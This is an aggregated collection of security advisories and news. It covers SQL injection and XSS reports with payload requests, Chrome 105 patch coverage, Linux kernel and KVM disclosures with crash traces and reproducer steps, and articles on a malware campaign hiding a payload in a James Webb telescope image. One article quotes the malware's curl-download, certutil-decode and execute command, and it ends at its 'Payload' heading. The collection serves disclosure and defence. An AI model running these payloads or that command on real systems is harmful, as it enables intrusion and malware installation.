Simple Task Scheduling System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /schedules/view_schedule.php.

Permalink

Cannot retrieve contributors at this time

**Simple Task Scheduling System v1.0 by oretnom23 has SQL injection**

BUG\_Author: RUST

vendors: https://www.sourcecodester.com/php/15328/simple-task-scheduler-system-phpoop-free-source-code.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /tss/admin/schedules/view\_schedule.php

Vulnerability location: /tss/admin/schedules/view\_schedule.php, id

db\_name = tss\_db;length=6

\[+\] Payload: /tss/admin/schedules/view\_schedule.php?id=1%27%20and%20length(database())%20=6--+ // Leak place ---> id

GET /tss/admin/schedules/view\_schedule.php?id\=1%27%20and%20length(database())%20\=6\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=tc6akb10bh652defck09t9eug4
Connection: close

When length (database ()) = 6 

When length (database ()) = 5

CVE-2022-36674: bug_report/SQLi-3.md at main · Nujabe4/bug_report

Simple Task Scheduling System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /schedules/manage_schedule.php.

Permalink

**Simple Task Scheduling System v1.0 by oretnom23 has SQL injection**

BUG\_Author: RUST

vendors: https://www.sourcecodester.com/php/15328/simple-task-scheduler-system-phpoop-free-source-code.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /tss/admin/schedules/manage\_schedule.php

Vulnerability location: /tss/admin/schedules/manage\_schedule.php, id

db\_name = tss\_db;length=6

\[+\] Payload: /tss/admin/schedules/manage\_schedule.php?id=1%27%20and%20length(database())%20=6--+ // Leak place ---> id

GET /tss/admin/schedules/manage\_schedule.php?id\=1%27%20and%20length(database())%20\=6\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=tc6akb10bh652defck09t9eug4
Connection: close

When length (database ()) = 6 

When length (database ()) = 5

CVE-2022-36675: bug_report/SQLi-2.md at main · Nujabe4/bug_report

But one issue that lets websites overwrite content on a user's system clipboard appears unfixed in the new Version 105 of Chrome.

Google's first stable channel version of Chrome 105 for Windows, Mac, and Linux, released this week, contained fixes for 24 vulnerabilities in previous versions of the software, including one "critical" flaw and eight that the company rated as being of "high" severity.

A plurality — nine — of the security issues that Google addressed with Chrome 105 were so-called use-after-free vulnerabilities, or flaws that allow attackers to use previously freed memory spaces to execute malicious code, corrupt data, and take other malicious actions. Four of the patched vulnerabilities were heap buffer-overflows in various Chrome components, including WebUI and Screen Capture.

Attackers often exploit buffer overflows for a variety of malicious purposes, including executing random code, overwriting data, crashing systems, and triggering denial-of-service conditions.

**Clipboard Overwriting**

One issue that Google does not appear to have fixed in the update centers around clipboards. According to Malwarebytes, when users of Google Chrome — or any Chromium-based browser — visit a website, the site can push any content they want to the user's OS clipboard, without the user's permission or any interaction.

"This means that by simply visiting a website, the data on your clipboard may be overwritten without your consent or knowledge," Malwarebytes said.

This can result in users losing valuable data they might have wanted to cut and paste elsewhere while also giving attackers an opening to try and sneak malicious code on a user's system, the security vendor said. The problem has to do with the absence of any requirement in Chrome and Chromium-based browser for users to take specific steps such as using "Ctrl+C" to copy content from a website to the user's clipboard, Malwarebytes said.

Security researcher Jeff Johnson identified the issue with Chrome as part of a broader problem that impacts both Safari and Firefox as well. "Chrome is currently the worst offender, because the user gesture requirement for writing to the clipboard was accidentally broken in version 104," he said in a report this week.

However, the reality is that users of other browsers such as Firefox and Safari can have websites overwriting their system clipboards more easily than they realize, Johnson said. Though both these browsers require users to take some action to copy website content to their clipboards, the actions are a lot broader than they might imagine.

For instance, actions like focusing out on a screen, or pressing keydown/ keyup and mousedown/ mouseup, can result in website content getting copied to the clipboard without the user's knowledge, Johnson said.

The researcher noted that Chrome developers are already aware of the issue and are addressing it. Google did not immediately response to a Dark Reading request for comment.

"Attackers may abuse this bug to copy malicious links to users' clipboards, which could result in users pasting those links in their address bar and accessing malicious sites accidentally," says Ivan Righi, senior cyber threat analyst at Digital Shadows.

"Another way this bug could be exploited is to conduct fraudulent cryptocurrency transactions. Threat actors could leverage the flaw in conjunction with social engineering attacks to get users to enter the wrong wallet addresses for transactions," Righi says. However, the likelihood of such attacks being successful is low because users are likely going to notice abnormal contents placed on their clipboard, he says.

**A Plethora of Use-After-Free Issues**

Meanwhile, the sole critical vulnerability (CVE-2022-3038) Google addressed with the stable version of Chrome 105 was reported by a security researcher from its own Project Zero bug hunting team: The use-after-free flaw in Google Chrome Network Service gives remote attackers a way to execute arbitrary code or trigger denial of service conditions on user systems by getting them to visit a weaponized website.

External bug hunters and security researchers reported all the remaining vulnerabilities that Google addressed this week in Chrome. The most consequential among them appears to have been CVE-2022-3039, a high-severity, user-after-free vulnerability in WebSQL that two researchers from China's 360 Vulnerability Research Institute reported to Google. The researchers received $10,000 for reporting the bug to Google — the highest amount awarded in the current set.

Another high-impact, use-after-free flaw in Chrome Layout garnered $9,000 for the anonymous security researcher that reported the issue to Google. Bounties for the remaining bugs ranged from $1,000 to $7,500. Google has not yet determined rewards for four bug disclosures.

As has become standard practice among major vendors, Google said it has restricted access to bug details until most users have an opportunity to implement the new, stable version of Chrome.

"We will also retain restrictions if the bug exists in a third-party library that other projects similarly depend on but haven’t yet fixed," Google said in a blog this week. A senior Microsoft security executive had recently used the same reason to explain why Microsoft's bug disclosures also contain scant details these days.

While the bug fixes are almost certainly the primary reason why users might want to update to the stable version of Chrome 105, the new browser version also introduces a handful of additional features. These include features that allow developers to add windows controls button — such as closing, maximizing, or minimizing — to progressive Web apps, a new picture-in-picture API for Chrome on Android, and improvements to Chrome's Navigation API.

Google Fixes 24 Vulnerabilities With New Chrome Update

Piwigo 12.3.0 is vulnerable to Cross Site Scripting (XSS) via /search/1940/created-monthly-list.

The value of the /search/1940/created-monthly-list request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The attacker can trick a user to visit some crafted URL that is connected exactly to this system. Then he can trick the user to visit some malicious address that the victim will think is connected with the original web address it depending on the scenario. This can be dangerous for all users of this system.

GET /piwigo/index.php?/search/4863/created\-monthly\-list%22%3Ehttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcom%3CYZxWX%3E HTTP/1.1
Host: pwned\_host.com
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,\*/\*;q\=0.8
Accept\-Language: en\-US,en;q\=0.5
Accept\-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: pwg\_id\=hctfqtab45adhogo2suhq2mr0c; ssc\_phoneSwap\=0
Upgrade\-Insecure\-Requests: 1

CVE-2022-37183: CVE-nu11secur1ty/vendors/Piwigo/2022/12.3.0 at main · nu11secur1ty/CVE-nu11secur1ty

By Waqas
Researchers have identified a new Golang-based malware campaign leveraging deep field images from the James Webb Space Telescope to deploy malware on infected devices. 
This is a post from HackRead.com Read the original post: Hackers spreading malware through images taken by James Webb Space Telescope

National Aeronautics and Space Administration’s (**NASA**) James Webb Space Telescope is known for the stunning images from space that it has been delivering us since its launching. Given its superior technology, the telescope can capture the earliest galaxies created shortly after the Big Bang.

Reportedly, hackers are also aware of their popularity and have decided to monetize from it.

**Beware of Images Containing Malware**

Securonix security researchers have identified a new Golang-based malware campaign leveraging deep field images from the James Webb Space Telescope to deploy malware on infected devices.

Dubbed GO#WEBBFUSCATOR, this persistent campaign highlights the increasing preference of malware operators for the Go programming language, probably because of its cross-platform support that lets hackers target different operating systems through a common codebase.

**Attack Details**

In their **report**, researchers D. Iuzvyk, T. Peck, and O. Kolesnikov explained that this campaign involves sending phishing emails that contain a Microsoft Office attachment named Geos-Rates.docx. The file is downloaded as a template.

These emails are the attack chain’s entry point. When the attachment is opened, an obfuscated VBA macro is auto-executed if the recipient has enabled macros. When executed, the macro downloads an image file titled OxB36F8GEEC634.jpg.

This appears to be the image of the First Deep Field sent from the telescope, but in reality, it is a Base64-encoded payload. The Windows 64-bit executable binary is 1.7MB in size. It can easily evade antimalware solutions and uses a technique called gobfuscation to utilize a Golang obfuscation tool, which is publicly available on GitHub.

According to researchers, crooks are using encrypted DNS queries/responses to communicate with the C2 server through which the malware can accept and run commands sent via the server through Windows Command Prompt.

> “Using a legitimate image to build a Golang binary with Certutil is not very common. It’s clear that the original author of the binary designed the payload with both some trivial counter-forensics and anti-EDR detection methodologies in mind,” researchers noted.
> 
> Securonix Threat Labs

1.  **Attackers successfully hide Mac malware in ad images**
2.  **Fake Cloudflare DDoS protection popups distribute malware**
3.  **GoogleUserContent CDN Hosting Images Infected with Malware**
4.  **Hackers exploit Raspberry Pi device to hack NASA’s mission system**
5.  **New attack spreads LokiBot and NanoCore malware in ISO image files**
6.  **Hacker disrupts Emotet botnet operation by replacing payload with GIFs**

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Hackers spreading malware through images taken by James Webb Space Telescope

A NULL pointer dereference flaw was found in the Linux kernel’s Amateur Radio AX.25 protocol functionality in the way a user connects with the protocol. This flaw allows a local user to crash the system.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Sat, 2 Apr 2022 16:14:37 +0800 (GMT+08:00)
From: 周多明 <duoming@....edu.cn>
To: oss-security@...ts.openwall.com
Subject: CVE-2022-1205 kernel: Null pointer dereference and use-after-free
 in net/ax25/ax25\_timer.c

Hello there,

There are NPD and use-after-free vulnerabilities in net/ax25/ax25\_timer.c
of linux that allow attacker to crash linux kernel by simulating ax25 device
from user space.

=\*=\*=\*=\*=\*=\*=\*=\*=  Bug Details  =\*=\*=\*=\*=\*=\*=\*=\*=

There are race conditions that may lead to null pointer dereferences in
ax25\_heartbeat\_expiry(), ax25\_t1timer\_expiry(), ax25\_t2timer\_expiry(),
ax25\_t3timer\_expiry() and ax25\_idletimer\_expiry(), when we use
ax25\_kill\_by\_device() to detach the ax25 device.

One of the race conditions that cause null pointer dereferences can be
shown as below:

      (Thread 1)                    |      (Thread 2)
ax25\_connect()                      |
 ax25\_std\_establish\_data\_link()     |
  ax25\_start\_t1timer()              |
   mod\_timer(&ax25->t1timer,..)     |
                                    | ax25\_kill\_by\_device()
   (wait a time)                    |  ...
                                    |  s->ax25\_dev = NULL; //(1)
   ax25\_t1timer\_expiry()            |
    ax25->ax25\_dev->values\[..\] //(2)|  ...
     ...                            |

We set null to ax25\_cb->ax25\_dev in position (1) and dereference
the null pointer in position (2).

There are also race conditions that may lead to UAF bugs in
ax25\_heartbeat\_expiry(), ax25\_t1timer\_expiry(), ax25\_t2timer\_expiry(),
ax25\_t3timer\_expiry() and ax25\_idletimer\_expiry(), when we call
ax25\_release() to deallocate ax25\_dev.

      (Thread 1)                    |      (Thread 2)
ax25\_dev\_device\_up() //(1)          |
...                                 | ax25\_kill\_by\_device()
ax25\_bind()          //(2)          |
ax25\_connect()                      | ...
 ax25\_std\_establish\_data\_link()     |
  ax25\_start\_t1timer()              | ax25\_dev\_device\_down() //(3)
   mod\_timer(&ax25->t1timer,..)     |
                                    | ax25\_release()
   (wait a time)                    |  ...
                                    |  ax25\_dev\_put(ax25\_dev) //(4)FREE
   ax25\_t1timer\_expiry()            |
    ax25->ax25\_dev->values\[..\] //USE|  ...
     ...                            |

We increase the refcount of ax25\_dev in position (1) and (2), and
decrease the refcount of ax25\_dev in position (3) and (4).
The ax25\_dev will be freed in position (4) and be used in
ax25\_t1timer\_expiry().

=\*=\*=\*=\*=\*=\*=\*=\*=  Bug Effects  =\*=\*=\*=\*=\*=\*=\*=\*=

We can successfully trigger the NPD and UAF vulnerabilities to crash the linux kernel.

BUG: kernel NULL pointer dereference, address: 0000000000000050
CPU: 1 PID: 0 Comm: swapper/1 Not tainted 5.17.0-rc6-00794-g45690b7d0
RIP: 0010:ax25\_t1timer\_expiry+0x12/0x40
...
Call Trace:
 call\_timer\_fn+0x21/0x120
 \_\_run\_timers.part.0+0x1ca/0x250
 run\_timer\_softirq+0x2c/0x60
 \_\_do\_softirq+0xef/0x2f3
 irq\_exit\_rcu+0xb6/0x100
 sysvec\_apic\_timer\_interrupt+0xa2/0xd0
...

==============================================================

\[  106.116942\] BUG: KASAN: use-after-free in ax25\_t1timer\_expiry+0x1c/0x60
\[  106.116942\] Read of size 8 at addr ffff88800bda9028 by task swapper/0/0
\[  106.116942\] CPU: 0 PID: 0 Comm: swapper/0 Not tainted 5.17.0-06123-g0905eec574
\[  106.116942\] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-14
\[  106.116942\] Call Trace:
...
\[  106.116942\]  ax25\_t1timer\_expiry+0x1c/0x60
\[  106.116942\]  call\_timer\_fn+0x122/0x3d0
\[  106.116942\]  \_\_run\_timers.part.0+0x3f6/0x520
\[  106.116942\]  run\_timer\_softirq+0x4f/0xb0
\[  106.116942\]  \_\_do\_softirq+0x1c2/0x651
...

=\*=\*=\*=\*=\*=\*=\*=\*=  Bug Fix  =\*=\*=\*=\*=\*=\*=\*=\*=

The patch that have been applied to mainline Linux kernel is shown below.
https://github.com/torvalds/linux/commit/fc6d01ff9ef03b66d4a3a23b46fc3c3d8cf92009
https://github.com/torvalds/linux/commit/82e31755e55fbcea6a9dfaae5fe4860ade17cbc0

=\*=\*=\*=\*=\*=\*=\*=\*=  Timeline  =\*=\*=\*=\*=\*=\*=\*=\*=

2022-03-21: commit fc6d01ff9ef0 accepted to mainline kernel
2022-03-29: commit 82e31755e55f accepted to mainline kernel
2022-04-01: CVE-2022-1205 is assigned

=\*=\*=\*=\*=\*=\*=\*=\*=  Credit  =\*=\*=\*=\*=\*=\*=\*=\*=

Duoming Zhou <duoming@....edu.cn>

Best Regards,
Duoming Zhou

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2022-1205: security - CVE-2022-1205 kernel: Null pointer dereference and use-after-free in net/ax25/ax25_timer.c

A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only shared memory mappings. This flaw allows an unprivileged, local user to gain write access to read-only memory mappings, increasing their privileges on the system.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

CVE-2022-2590: security - CVE-2022-2590: Linux kernel: Modifying shmem/tmpfs files without write permissions

A NULL pointer dereference issue was found in KVM when releasing a vCPU with dirty ring support enabled. This flaw allows an unprivileged local attacker on the host to issue specific ioctl calls, causing a kernel oops condition that results in a denial of service.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[thread-next>\] \[day\] \[month\] \[year\] \[list\]

Date: Thu, 7 Apr 2022 10:15:42 +0800 (GMT+08:00)
From: kangel <kangel@....edu.cn>
To: oss-security@...ts.openwall.com
Cc: pgn@....edu.cn, qiuhao@...ec.org
Subject: Linux kernel: x86/kvm: null-ptr-deref in kvm\_dirty\_ring\_push




-----原始邮件-----
发件人:kangel <kangel@....edu.cn>
发送时间:2022-04-06 21:11:39 (星期三)
收件人: security@...nel.org, linux-distros@...openwall.org
抄送: secalert@...hat.com, pbonzini@...hat.com, pgn@....edu.cn, qiuhao@...ec.org
主题: \[vs\] x86/kvm: null-ptr-deref in kvm\_dirty\_ring\_push


Hi developers,
    We found a null-ptr-deref in the kvm module which can lead to DoS. This flaw is in kvm\_dirty\_ring\_push in virt/kvm/dirty\_ring.c. The linux kernel version is 5.17.0-rc8. We would appreciate a CVE ID if this is a security issue.
------------\[ Description \]------------
    When we call kvm\_vcpu\_release(), it will call kvm\_dirty\_ring\_free() which will free ring->dirty\_gfns and set it to NULL. Then if we can set kvm->dirty\_ring\_size != NULL\[1\] and make vcpu->arch.st.preempt to NULL\[2\], it will call kvm\_dirty\_ring\_push() and lead to null-ptr-deref in virt/kvm/dirty\_ring.c:159.
    The condition of \[1\] can be set by do ioctl$KVM\_CAP\_DIRTY\_LOG\_RING and the condition of \[2\] can be set by race of doing ioctf$KVM\_RUN.
------------\[ Reproducer \]------------
qemu run:
qemu-system-x86\_64 -m 512M -smp 2 -kernel /home/zju/linux-5.17-rc8/arch/x86/boot/bzImage -append "console=ttyS0 root=/dev/sda earlyprintk=serial net.ifnames=0 nokaslr" -drive file=/home/zju/script/stretch2.img,format=raw -net user,host=10.0.2.10,hostfwd=tcp:127.0.0.1:10021-:22 -net nic,model=e1000 -enable-kvm -nographic 
poc.c is attached( run in qemu).
gcc poc.c -static -o poc -lpthread

------------\[ Credits \]------------
Yongkang Jia (Zhejiang University)
Gaoning Pan (Zhejiang University)
Qiuhao Li (Harbin Institute of Technology)
------------\[ Backtrace \]------------
KASAN: null-ptr-deref in range \[0x0000000000000030-0x0000000000000037\]
CPU: 0 PID: 453 Comm: syz-executor425 Not tainted 5.17.0 #3
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1ubuntu1~cloud0 04/01/2014
RIP: 0010:kvm\_dirty\_ring\_push+0x10c/0x2e0 arch/x86/kvm/../../../virt/kvm/dirty\_ring.c:159
Code: 0f 8e 8e 01 00 00 48 b8 00 00 00 00 00 fc ff df 41 83 ec 01 44 23 65 00 49 c1 e4 04 4c 01 e3 48 8d 7b 04 48 89 fa 48 c1 ea 03 <0f> b6 14 02 48 89 f8 83 e0 07 83 c0 03 38 d0 7c 08 84 d2 0f 85 47
RSP: 0018:ffff88800812fb88 EFLAGS: 00010207
RAX: dffffc0000000000 RBX: 0000000000000030 RCX: ffffffffa5a929d4
RDX: 0000000000000006 RSI: 0000000000000000 RDI: 0000000000000034
RBP: ffff888004d12118 R08: 0000000000000001 R09: fffffbfff5104469
R10: 0000000000000000 R11: fffffbfff5104468 R12: 0000000000000030
R13: 0000000000000000 R14: 0000000000000000 R15: ffff888004d10dd0
FS:  0000000000868880(0000) GS:ffff88806d200000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000000020ffe010 CR3: 0000000005ba4002 CR4: 00000000003726f0
DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Call Trace:
 <TASK>
 mark\_page\_dirty\_in\_slot+0x192/0x270 arch/x86/kvm/../../../virt/kvm/kvm\_main.c:3171
 kvm\_steal\_time\_set\_preempted arch/x86/kvm/x86.c:4600 \[inline\]
 kvm\_arch\_vcpu\_put+0x34e/0x5b0 arch/x86/kvm/x86.c:4618
 vcpu\_put+0x1b/0x70 arch/x86/kvm/../../../virt/kvm/kvm\_main.c:211
 vmx\_free\_vcpu+0xcb/0x130 arch/x86/kvm/vmx/vmx.c:6985
 kvm\_arch\_vcpu\_destroy+0x76/0x290 arch/x86/kvm/x86.c:11219
 kvm\_vcpu\_destroy arch/x86/kvm/../../../virt/kvm/kvm\_main.c:441 \[inline\]
 kvm\_destroy\_vcpus+0x119/0x280 arch/x86/kvm/../../../virt/kvm/kvm\_main.c:460
 kvm\_free\_vcpus arch/x86/kvm/x86.c:11659 \[inline\]
 kvm\_arch\_destroy\_vm+0x22a/0x380 arch/x86/kvm/x86.c:11769
 kvm\_destroy\_vm arch/x86/kvm/../../../virt/kvm/kvm\_main.c:1217 \[inline\]
 kvm\_put\_kvm+0x3ff/0x900 arch/x86/kvm/../../../virt/kvm/kvm\_main.c:1250
 kvm\_vcpu\_release+0x4d/0x70 arch/x86/kvm/../../../virt/kvm/kvm\_main.c:3668
 \_\_fput+0x21b/0x940 fs/file\_table.c:317
 task\_work\_run+0xde/0x180 kernel/task\_work.c:164
 tracehook\_notify\_resume include/linux/tracehook.h:188 \[inline\]
 exit\_to\_user\_mode\_loop kernel/entry/common.c:175 \[inline\]
 exit\_to\_user\_mode\_prepare+0x14d/0x150 kernel/entry/common.c:207
 \_\_syscall\_exit\_to\_user\_mode\_work kernel/entry/common.c:289 \[inline\]
 syscall\_exit\_to\_user\_mode+0x1d/0x40 kernel/entry/common.c:300
 do\_syscall\_64+0x48/0x90 arch/x86/entry/common.c:86
 entry\_SYSCALL\_64\_after\_hwframe+0x44/0xae
------------\[ Patch \]------------
We try to do a patch, which can not make the poc trigger this flaw.
diff --git a/virt/kvm/dirty\_ring.c b/virt/kvm/dirty\_ring.c.patch
index 222ecc8..38f1b66 100644
--- a/virt/kvm/dirty\_ring.c
+++ b/virt/kvm/dirty\_ring.c.patch
@@ -154,6 +154,8 @@ void kvm\_dirty\_ring\_push(struct kvm\_dirty\_ring \*ring, u32 slot, u64 offset)
        /\* It should never get full \*/
        WARN\_ON\_ONCE(kvm\_dirty\_ring\_full(ring));

+       if (!ring->dirty\_gfns)
+               return;
        entry = &ring->dirty\_gfns\[ring->dirty\_index & (ring->size - 1)\];

        entry->slot = slot;


------------\[ Cut here \]------------
C repro and kernel config are attached.
Best regards.
    Yongkang Jia of Zhejiang University

**Content of type "**text/html**" skipped**

**View attachment "**poc.c**" of type "**text/plain**" (6534 bytes)**

**Download attachment "**config**" of type "**application/octet-stream**" (130642 bytes)**

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2022-1263: security - Linux kernel: x86/kvm: null-ptr-deref in kvm_dirty_ring_push

Categories: News
Categories: Threats
Tags: Msdllupdate.exe

Tags:  macros

Tags:  James Webb

Tags:  certutil

Tags:  Golang

Tags:  base64

Tags:  steganography

Tags:  OxB36F8GEEC634.jpg

In a recent malware campaign, images from the James Webb telescope were used to hide malware.



(Read more...)




The post James Webb telescope images used to hide malware appeared first on Malwarebytes Labs.

A rather unique approach to spread malware using the popularity of the James Webb telescope images has been identified by the Securonix threat research team.

The malware is being spread by a phishing campaign that includes a Microsoft Office attachment. Similar to traditional Office macros, the template file contains a Visual Basic script that will initiate the first stage of code execution for this attack once the user enables macros. Through several steps the actual payload turns out to be a Golang binary file that acts as a backdoor.

**Golang**

Golang or GO, which is the actual name of Golang, is an open source programming language. Some threat actors have started writing malicious code using cross-platform programming languages like Golang, Python, and Rust, with the aim of penetrating and encrypting as many systems as possible. This allows their malware to run on different combinations of operating systems and architectures.

**VBA Macro**

In this campaign, when the document is opened, a malicious template file is downloaded and saved on the system. The template includes the functions **Auto\_Open**, **AutoOpen**, and **AutoExec**. The malicious VBA macro code is set to be auto executed once macros are enabled.

VBA macros should be disabled unless there are compelling reasons not to. As we explained when Microsoft disabled macros for five Office apps, the Mark of the Web (MOTW) can be circumvented by malware authors.

**Certificate**

The obfuscated code in the macro executes the following command:

**cmd.exe  /c cd c:\\users\\{username}\\appdata\\local & curl http://www.xmlschemeformat.com/update/2021/office/oxb36f8geec634.jpg -o oxb36f8geec634.jpg & certutil -decode oxb36f8geec634.jpg msdllupdate.exe & msdllupdate.exe**

This command will download a file named OxB36F8GEEC634.jpg, use certutil.exe to decode it into a binary called msdllupdate.exe and then finally, execute that binary.

But, if you open the .jpg with any of the programs that are normally associated with JPG files, you will see this image:

But, remember when we talked about steganography? Images can be used to hide information, or an executable in this case.

**Obfuscation**

The image contains malicious Base64 code disguised as an included certificate. Base64 is an encoding scheme designed to carry data stored in binary formats across channels that only reliably support text content. Base64 is particularly prevalent on the World Wide Web where one of its uses is the ability to embed image files or other binary assets inside textual assets such as HTML and CSS files.

In the command we saw how the legitimate certutil was used to decode the so-called certificate and create a binary called msdllupdate.exe.

**Payload**

